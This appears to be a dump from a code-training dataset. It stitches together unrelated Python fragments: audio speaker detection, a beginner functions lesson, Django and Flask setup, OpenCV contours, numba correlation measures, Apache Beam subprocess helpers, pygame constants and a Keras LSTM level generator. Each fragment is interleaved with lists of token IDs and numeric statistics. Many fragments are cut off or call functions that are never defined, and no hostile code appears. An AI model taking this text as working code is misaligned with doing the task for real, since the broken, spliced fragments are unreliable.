# boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
s1x[s1x >= 0.1] = 1
s2x[s2x >= 0.1] = 1
s1x[s1x < 0.1] = 0
s2x[s2x < 0.1] = 0
return s1x, s2x
| [
11748,
4423,
346,
198,
11748,
20218,
7753,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
11748,
9195,
4951,
64,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
1582,
741,
14775,
355,
9114,
198,
11748,
629,
541,
88,
13,
952,
13,
45137,
... | 2.368852 | 1,342 |
''' Functions with output
def my_function(something):
#Do this with something
#Then do this
#finally do this
def my_function():
return 3 * 2 # result
'''
# def format_name(f_name, l_name):
# print(f_name.title())
# print(l_name.title())
# format_name("rich", "MATSON") # Rich
# Matson
# def format_name(f_name, l_name):
# formated_f_name = f_name.title()
# formated_l_name = l_name.title()
# print(f"{formated_f_name} {formated_l_name}") # Richard Matson
# format_name("RichARD", "MATSON")
# formated_string = format_name("RichARD", "MATSON")
# print(formated_string) # Richard Matson
print(format_name("RicHARD", "MATSON")) # Richard Matson
output = len("Richard")
| [
7061,
6,
40480,
351,
5072,
198,
4299,
616,
62,
8818,
7,
18927,
2599,
198,
220,
220,
220,
1303,
5211,
428,
351,
1223,
198,
220,
220,
220,
1303,
6423,
466,
428,
198,
220,
220,
220,
1303,
69,
3289,
466,
428,
198,
198,
4299,
616,
62,
... | 2.322086 | 326 |
import csv
import os
from score_comparer import ScoreComparer
| [
11748,
269,
21370,
198,
11748,
28686,
198,
6738,
4776,
62,
5589,
11258,
1330,
15178,
7293,
11258,
198
] | 3.647059 | 17 |
import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='analyze whole stems.')
parser.add_argument(
'inpath', type=str, help='path to the stem of interest')
parser.add_argument(
'outpath', type=str, help='path to the stem of interest')
rough_midi(parser.parse_args())
| [
11748,
410,
696,
198,
11748,
9195,
4951,
64,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2495,
62,
13602,
72,
198,
11748,
44147,
198,
11748,
28686,
198,
11748,
1822,
29572,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834... | 2.650602 | 166 |
import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('hub.urls')),
)
urlpatterns += staticfiles_urlpatterns()
| [
11748,
28686,
198,
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
7572,
11,
2291,
11,
19016,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
42625,
14208,
13,
3642,
822,
13,
12708,
16624,
13,
6371,
82,
1330,
9037,
... | 2.633987 | 153 |
from os.path import expanduser
import cv2
from keras.models import load_model
from matplotlib import pyplot as plt
import numpy as np
# Create kernel for cv2 dilation method
KERNEL = np.ones((5,5),np.uint8)
# Import the model
model = load_model('big_model')
# Read input image
img = cv2.imread(expanduser('~/Desktop/rummikub/images/prediction_test/pred_pic.png'))
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(imgray, (5, 5), 0)
edges = cv2.Canny(blurred, 100, 250)
edges = cv2.dilate(edges, KERNEL, iterations = 1)
contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
edges = cv2.cvtColor(edges,cv2.COLOR_GRAY2RGB)
for points in contours[0]:
coor_list = points[0].tolist()
edges = cv2.circle(edges, (coor_list[0],coor_list[1]), radius=5, color=(0, 250, 0), thickness=5)
cv2.imshow('edges', edges)
cv2.destroyAllWindows()
# Helpful links to continue this:
# https://www.pyimagesearch.com/2020/08/24/ocr-handwriting-recognition-with-opencv-keras-and-tensorflow/
# https://www.youtube.com/watch?v=6DjFscX4I_c
# https://stackoverflow.com/questions/60873721/python-contour-around-rectangle-based-on-specific-color-on-a-dark-image-opencv
# https://www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/
# https://arnab.org/blog/so-i-suck-24-automating-card-games-using-opencv-and-python/
| [
198,
6738,
28686,
13,
6978,
1330,
4292,
7220,
198,
198,
11748,
269,
85,
17,
198,
6738,
41927,
292,
13,
27530,
1330,
3440,
62,
19849,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
6... | 2.416955 | 578 |
"""Support file to handle configuration files."""
import json
import os
class Config():
"""Class for serializing configuration items."""
def get(self, key=None, default=None):
"""Get a config item."""
if key is None:
# return all public config items (filter out the hidden items)
return {key: self.__config[key] for key in self.__config if not key.startswith('__')}
return self.__config.get(key, default)
def set(self, key, value):
"""Set a config item."""
self.__config[key] = value
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
def remove(self, key):
"""Set a config item."""
del self.__config[key]
with open(self.filename, 'w') as file:
file.write(json.dumps(self.__config))
| [
37811,
15514,
2393,
284,
5412,
8398,
3696,
526,
15931,
198,
11748,
33918,
198,
11748,
28686,
628,
198,
4871,
17056,
33529,
198,
220,
220,
220,
37227,
9487,
329,
11389,
2890,
8398,
3709,
526,
15931,
628,
220,
220,
220,
825,
651,
7,
944,
... | 2.456647 | 346 |
from flask_jwt_extended import create_access_token,JWTManager
from flask import jsonify
from application import app
from application.models.UserMaster import UserMaster
from application.config.config import Config
conf = Config()
app.config['JWT_SECRET_KEY'] = conf.JWT_SECRET_KEY
app.config['PROPAGATE_EXCEPTIONS'] = True
jwt = JWTManager(app=app)
@jwt.expired_token_loader
@jwt.invalid_token_loader
@jwt.unauthorized_loader
| [
6738,
42903,
62,
73,
46569,
62,
2302,
1631,
1330,
2251,
62,
15526,
62,
30001,
11,
41,
39386,
13511,
198,
6738,
42903,
1330,
33918,
1958,
198,
6738,
3586,
1330,
598,
198,
6738,
3586,
13,
27530,
13,
12982,
18254,
1330,
11787,
18254,
198,
... | 3 | 146 |
# -*- coding: utf-8 -*-
import pytest
from girder.exceptions import AccessException
from girder.models.setting import Setting
from girder.models.user import User
from girder.settings import SettingKey
from pytest_girder.assertions import assertStatus, assertStatusOk
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
12972,
9288,
198,
198,
6738,
37370,
1082,
13,
1069,
11755,
1330,
8798,
16922,
198,
6738,
37370,
1082,
13,
27530,
13,
33990,
1330,
25700,
198,
6738,
37370,
1082,
13,... | 3.481013 | 79 |
""" PyTorch implementation of the Primal Dual Optimization (PDO) algorithm.
Author: Sven Gronauer (sven.gronauer@tum.de)
Created: 28.10.2020
Updated: --
inspired by:
Joshua Achiam, David Held, Aviv Tamar, Peter Abbeel
Constrained Policy Optimization
ICML 2017
also see:
Yinlam Chow, Mohammad Ghavamzadeh, Lucas Janson, and Marco Pavone
Risk-constrained reinforcement learning with percentile risk criteria
J. Mach. Learn. Res. 2017
"""
import numpy as np
from torch import optim
import torch
from rl_safety_algorithms.algs.cpo.cpo import CPOAlgorithm
from rl_safety_algorithms.algs.core import ConstrainedPolicyGradientAlgorithm
from rl_safety_algorithms.algs.npg.npg import NaturalPolicyGradientAlgorithm
from rl_safety_algorithms.algs.trpo.trpo import TRPOAlgorithm
import rl_safety_algorithms.algs.utils as U
from rl_safety_algorithms.common import utils
import rl_safety_algorithms.common.mpi_tools as mpi_tools
| [
37811,
9485,
15884,
354,
7822,
286,
262,
37712,
20446,
30011,
1634,
357,
5760,
46,
8,
11862,
13,
198,
198,
13838,
25,
220,
220,
220,
220,
44611,
40214,
16261,
357,
82,
574,
13,
70,
1313,
16261,
31,
83,
388,
13,
2934,
8,
198,
41972,
... | 2.923547 | 327 |
import scrapy
from scrapy import Request
import scraper_helper as sh
from scrapy.selector import Selector
review_url = 'https://www.amazon.com/product-reviews/{}'
asin_list = ['B08CVSL4K5'] #Roborock
| [
11748,
15881,
88,
198,
6738,
15881,
88,
1330,
19390,
198,
11748,
19320,
525,
62,
2978,
525,
355,
427,
198,
6738,
15881,
88,
13,
19738,
273,
1330,
9683,
273,
628,
198,
19023,
62,
6371,
796,
705,
5450,
1378,
2503,
13,
33103,
13,
785,
... | 2.9 | 70 |
from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.permissions import permission_document_type_edit
from mayan.apps.navigation.classes import Link
from .icons import (
icon_document_metadata_add, icon_document_metadata_edit,
icon_document_metadata_remove, icon_document_metadata_view,
icon_metadata_type_create, icon_metadata_type_delete,
icon_metadata_type_document_type_list, icon_metadata_type_edit,
icon_metadata_type_list, icon_document_type_metadata_type_list
)
from .permissions import (
permission_document_metadata_add, permission_document_metadata_edit,
permission_document_metadata_remove, permission_document_metadata_view,
permission_metadata_type_create, permission_metadata_type_delete,
permission_metadata_type_edit, permission_metadata_type_view
)
link_metadata_add = Link(
args='object.pk', icon=icon_document_metadata_add,
permissions=(permission_document_metadata_add,), text=_('Add metadata'),
view='metadata:metadata_add',
)
link_metadata_edit = Link(
args='object.pk', icon=icon_document_metadata_edit,
permissions=(permission_document_metadata_edit,),
text=_('Edit metadata'), view='metadata:metadata_edit'
)
link_metadata_multiple_add = Link(
icon=icon_document_metadata_add, text=_('Add metadata'),
view='metadata:metadata_multiple_add'
)
link_metadata_multiple_edit = Link(
icon=icon_document_metadata_edit, text=_('Edit metadata'),
view='metadata:metadata_multiple_edit'
)
link_metadata_multiple_remove = Link(
icon=icon_document_metadata_remove, text=_('Remove metadata'),
view='metadata:metadata_multiple_remove'
)
link_metadata_remove = Link(
args='object.pk', icon=icon_document_metadata_remove,
permissions=(permission_document_metadata_remove,),
text=_('Remove metadata'), view='metadata:metadata_remove',
)
link_metadata_view = Link(
args='resolved_object.pk', icon=icon_document_metadata_view,
permissions=(permission_document_metadata_view,), text=_('Metadata'),
view='metadata:metadata_view',
)
link_document_type_metadata_type_relationship = Link(
args='resolved_object.pk',
icon=icon_document_type_metadata_type_list,
permissions=(permission_document_type_edit,),
text=_('Metadata types'), view='metadata:document_type_metadata_type_relationship',
)
link_metadata_type_document_type_relationship = Link(
args='resolved_object.pk',
icon=icon_metadata_type_document_type_list,
permissions=(permission_document_type_edit,),
text=_('Document types'), view='metadata:metadata_type_document_type_relationship',
)
link_metadata_type_create = Link(
icon=icon_metadata_type_create,
permissions=(permission_metadata_type_create,), text=_('Create new'),
view='metadata:metadata_type_create'
)
link_metadata_type_delete = Link(
args='object.pk', icon=icon_metadata_type_delete,
permissions=(permission_metadata_type_delete,),
tags='dangerous', text=_('Delete'), view='metadata:metadata_type_delete',
)
link_metadata_type_edit = Link(
args='object.pk', icon=icon_metadata_type_edit,
permissions=(permission_metadata_type_edit,),
text=_('Edit'), view='metadata:metadata_type_edit'
)
link_metadata_type_list = Link(
icon=icon_metadata_type_list,
permissions=(permission_metadata_type_view,),
text=_('Metadata types'), view='metadata:metadata_type_list'
)
| [
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
201,
198,
201,
198,
6738,
743,
272,
13,
18211,
13,
15390,
2886,
13,
525,
8481,
1330,
7170,
62,
22897,
62,
4906,
62,
19312,
201,
198,
6738,
74... | 2.873042 | 1,213 |
from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
"""Pearson correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
cor : float
Pearson correlation
"""
if x.ndim > 1: x = x.ravel()
if y.ndim > 1: y = y.ravel()
# Define variables for looping
n, sx, sy, sx2, sy2, sxy = len(x), 0.0, 0.0, 0.0, 0.0, 0.0
# Loop to calculate statistics
for i in range(n):
xi = x[i]
yi = y[i]
sx += xi
sx2 += xi*xi
sy += yi
sy2 += yi*yi
sxy += xi*yi
# Covariance terms
cov = n*sxy - sx*sy
ssx = n*sx2 - sx*sx
ssy = n*sy2 - sy*sy
# Catch division by zero errors
if ssx == 0.0 or ssy == 0.0:
return 0.0
else:
return cov/np.sqrt(ssx*ssy)
def cca(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest canonical correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
X = X-X.mean(axis=0)
Y = Y-Y.mean(axis=0)
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return [0.0]
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return [0.0]
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return np.clip(cor[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between X and Y
"""
if X.ndim < 2: X = X.reshape(-1, 1)
if Y.ndim < 2: Y = Y.reshape(-1, 1)
# Shape of random vectors
Xn, Xp = X.shape
Yn, Yp = Y.shape
# X data
X_ones = np.ones((Xn, 1))
X_ = np.array([rank(X[:, j])/float(Xn) for j in range(Xp)]).reshape(Xn, Xp)
X_ = (s/X_.shape[1])*np.column_stack([X_, X_ones])
X_ = X_.dot(np.random.randn(X_.shape[1], k))
# Y data
Y_ones = np.ones((Yn, 1))
Y_ = np.array([rank(Y[:, j])/float(Yn) for j in range(Yp)]).reshape(Yn, Yp)
Y_ = (s/Y_.shape[1])*np.column_stack([Y_, Y_ones])
Y_ = Y_.dot(np.random.randn(Y_.shape[1], k))
# Apply canonical correlation
X_ = np.column_stack([f(X_), X_ones])
Y_ = np.column_stack([f(Y_), Y_ones])
return cca(X_, Y_)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
mu_x = np.array([np.mean(X[:, j]) for j in range(Xp)])
mu_y = np.array([np.mean(Y[:, j]) for j in range(Yp)])
X = X-mu_x
Y = Y-mu_y
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return np.array([0.0])
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return np.array([0.0])
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between x and y
"""
# Shape of random vectors
xn = x.shape[0]
yn = y.shape[0]
# X data
x_ones = np.ones((xn, 1))
X_ = np.argsort(x)/float(xn)
X_ = 0.5*s*np.column_stack((X_, x_ones))
X_ = np.dot(X_, np.random.randn(2, k))
# Y data
y_ones = np.ones((yn, 1))
Y_ = np.argsort(y)/float(yn)
Y_ = 0.5*s*np.column_stack((Y_, y_ones))
Y_ = np.dot(Y_, np.random.randn(2, k))
# Apply canonical correlation
X_ = np.column_stack((f(X_), x_ones))
Y_ = np.column_stack((f(Y_), y_ones))
cor = cca_fast(X_, Y_)[0]
if cor < 0.0:
return 0.0
elif cor > 1.0:
return 1.0
else:
return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
# Define initial variables
n = x.shape[0]
s = int(n*(n-1)/2.)
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
F = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
F[k] = weights[i]*weights[j]
S1 += DMX[k]*DMY[k]*F[k]
S1X += DMX[k]*DMX[k]*F[k]
S1Y += DMY[k]*DMY[k]*F[k]
Edx[i] += DMX[k]*weights[j]
Edy[j] += DMY[k]*weights[i]
Edx[j] += DMX[k]*weights[i]
Edy[i] += DMY[k]*weights[j]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]*weights[i]
S2a += Edy[i]*weights[i]
S2b += Edx[i]*weights[i]
S3X += Edx[i]*Edx[i]*weights[i]
S3Y += Edy[i]*Edy[i]*weights[i]
# Variance and covariance terms
S1 = 2*S1
S1Y = 2*S1Y
S1X = 2*S1X
S2 = S2a*S2b
S2X = S2b*S2b
S2Y = S2a*S2a
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
s = int(n*(n-1)/2.)
n2 = n*n
n3 = n2*n
n4 = n3*n
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
S1 += DMX[k]*DMY[k]
S1X += DMX[k]*DMX[k]
S1Y += DMY[k]*DMY[k]
Edx[i] += DMX[k]
Edy[j] += DMY[k]
Edx[j] += DMX[k]
Edy[i] += DMY[k]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]
S2a += Edy[i]
S2b += Edx[i]
S3X += Edx[i]*Edx[i]
S3Y += Edy[i]*Edy[i]
# Variance and covariance terms
S1 = (2*S1)/float(n2)
S1Y = (2*S1Y)/float(n2)
S1X = (2*S1X)/float(n2)
S2 = S2a*S2b/float(n4)
S2X = S2b*S2b/float(n4)
S2Y = S2a*S2a/float(n4)
S3 /= float(n3)
S3X /= float(n3)
S3Y /= float(n3)
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
# Lambda function used in approx_wdcor function
MEAN = lambda z: sum(z)/float(len(z))
def approx_wdcor(x, y):
"""Approximate distance correlation by binning arrays
NOTE: Code ported from R function approx.dcor at:
https://rdrr.io/cran/extracat/src/R/wdcor.R
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
# Equal cuts and then create dataframe
n = x.shape[0]
cx = pd.cut(x, n, include_lowest=True)
cy = pd.cut(y, n, include_lowest=True)
df = pd.DataFrame(
np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
)
# Average values in interval
vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values
# Calculate frequencies based on groupings
f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()
# Normalize weights and calculate weighted distance correlation
w = f.values/float(f.values.sum())
# Recompute n
n = len(w)
# Call either the Python or C version based on array length
if n > 5000:
return c_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
else:
return py_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
def c_wdcor(x, y, weights):
"""Wrapper for C version of weighted distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.wdcor(array_type(*x),
array_type(*y),
ctypes.c_int(n),
array_type(*weights))
def c_dcor(x, y):
"""Wrapper for C version of distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.dcor(array_type(*x),
array_type(*y),
ctypes.c_int(n))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
"""Multiple correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
n_classes : int
Number of classes
Returns
-------
cor : float
Multiple correlation coefficient between x and y
"""
ssb, mu = 0.0, x.mean()
# Sum of squares total
sst = np.sum((x-mu)*(x-mu))
if sst == 0.0: return 0.0
for j in range(n_classes):
# Grab data for current class and if empty skip
group = x[y==j]
if group.shape[0] == 0: continue
# Sum of squares between
mu_j = group.mean()
n_j = group.shape[0]
ssb += n_j*(mu_j-mu)*(mu_j-mu)
return np.sqrt(ssb/sst)
def mi(x, y):
"""Mutual information
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
info : float
Mutual information between x and y
"""
if x.ndim == 1: x = x.reshape(-1, 1)
return mutual_info_classif(x, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
"""Gini index for node in tree
Note: Despite being jitted, this function is still slow and a bottleneck
in the actual training phase. Sklearn's Cython version is used to
find the best split and this function is then called on the parent node
and two child nodes to calculate feature importances using the mean
decrease impurity formula
Parameters
----------
y : 1d array-like
Array of labels
labels : 1d array-like
Unique labels
Returns
-------
gini : float
Gini index
"""
# Gini index for each label
n, gini = len(y), 0.0
for label in labels:
# Proportion of each label
p = np.mean(y == label)
# Only square if greater than 0
if p > 0: gini += p*p
# Gini index
return 1 - gini
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
"""Mean squared error for node in tree
Parameters
----------
y : 1d array-like
Array of labels
Returns
-------
error : float
Mean squared error
"""
mu = y.mean()
return np.mean((y-mu)*(y-mu))
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
198,
11748,
269,
19199,
198,
6738,
997,
7012,
1330,
299,
45051,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
28686,
13,
6978,
1330,
26672,
3672,
11,
... | 1.988381 | 7,918 |
import json
import psutil
__all__ = ['SystemdUnitStatus', 'Use']
| [
11748,
33918,
198,
11748,
26692,
22602,
198,
198,
834,
439,
834,
796,
37250,
11964,
67,
26453,
19580,
3256,
705,
11041,
20520,
628,
198
] | 2.956522 | 23 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'
# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError
if TYPE_CHECKING:
call = subprocess.call
check_call = subprocess.check_call
check_output = subprocess.check_output
Popen = subprocess.Popen
else:
| [
2,
198,
2,
49962,
284,
262,
24843,
10442,
5693,
357,
1921,
37,
8,
739,
530,
393,
517,
198,
2,
18920,
5964,
11704,
13,
220,
4091,
262,
28536,
2393,
9387,
351,
198,
2,
428,
670,
329,
3224,
1321,
5115,
6634,
9238,
13,
198,
2,
383,
... | 3.84 | 400 |
import pygame
# It seems that up to USEREVENT + 3 are already taken.
# Anyway, an event for server announces.
# It's about time for the server to advertise its presence.
E_ANNOUNCE = pygame.USEREVENT + 4
# A state change has occurred.
E_STATE = pygame.USEREVENT + 5
# Player in the lobby.
S_LOBBY = 0
# Player creating a new server.
S_CREATE = 1
# Player joining an existing game.
S_JOIN = 2
# Player in the game.
S_GAME = 3
# Player in the game, placing ships.
S_GAME_PLACING = 4
# Player in the game, waiting for their turn.
S_GAME_WAITING = 5
# Player's turn, cherry-picking the tile to bomb.
S_GAME_SHOOTING = 6
S_GAME_LAST = 6
| [
11748,
12972,
6057,
198,
198,
2,
632,
2331,
326,
510,
284,
1294,
9338,
53,
3525,
1343,
513,
389,
1541,
2077,
13,
198,
2,
21836,
11,
281,
1785,
329,
4382,
26459,
13,
198,
198,
2,
632,
338,
546,
640,
329,
262,
4382,
284,
32740,
663,... | 2.877828 | 221 |
from __future__ import print_function
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout
from keras.layers.recurrent import LSTM
from keras.utils.data_utils import get_file
import numpy as np
import random
import sys
import os
if __name__ == "__main__":
all_folders = "../levels_transposed/"
result_path = "../levels_prediction_textfiles/"
original_level_path = all_folders + sys.argv[1]
try:
text = open(original_level_path).read().lower()
except UnicodeDecodeError:
import codecs
text = codecs.open(original_level_path, encoding='utf-8').read().lower()
chars = set(text)
words = set(open(original_level_path).read().lower().split())
word_indices = dict((c, i) for i, c in enumerate(words))
indices_word = dict((i, c) for i, c in enumerate(words))
maxlen = 30
step = 3
print("maxlen:",maxlen,"step:", step)
sentences = []
next_words = []
next_words= []
sentences1 = []
list_words = []
sentences2=[]
list_words=text.lower().split()
for i in range(0,len(list_words)-maxlen, step):
sentences2 = ' '.join(list_words[i: i + maxlen])
sentences.append(sentences2)
next_words.append((list_words[i + maxlen]))
# print('Vectorization...')
X = np.zeros((len(sentences), maxlen, len(words)), dtype=np.bool)
y = np.zeros((len(sentences), len(words)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, word in enumerate(sentence.split()):
#print(i,t,word)
X[i, t, word_indices[word]] = 1
y[i, word_indices[next_words[i]]] = 1
#build the model: 2 stacked LSTM
# print('Build model...')
model = Sequential()
model.add(LSTM(512, return_sequences=True, input_shape=(maxlen, len(words))))
model.add(Dropout(0.2))
